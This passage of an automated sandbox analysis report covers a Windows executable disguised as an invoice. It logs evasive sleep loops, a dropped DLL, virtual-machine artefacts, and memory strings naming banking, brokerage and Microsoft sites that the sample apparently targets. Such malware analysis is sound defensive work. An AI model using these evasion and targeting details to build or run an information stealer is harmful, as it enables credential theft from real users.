Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595873	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594546	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Window / User API: threadDelayed 8178			Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Window / User API: threadDelayed 1677			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8124	Thread sleep count: 8178 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8124	Thread sleep count: 1677 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -597590s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -597288s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -595873s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120	Thread sleep time: -594546s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00402868 FindFirstFileW,	3_2_00402868
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_004065C7 FindFirstFileW,FindClose,	3_2_004065C7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00405996

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597590	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597288	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595873	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 594546	Jump to behavior

Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.000000000598C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000000.00000002.1871926303.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	API call chain: ExitProcess graph end node

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

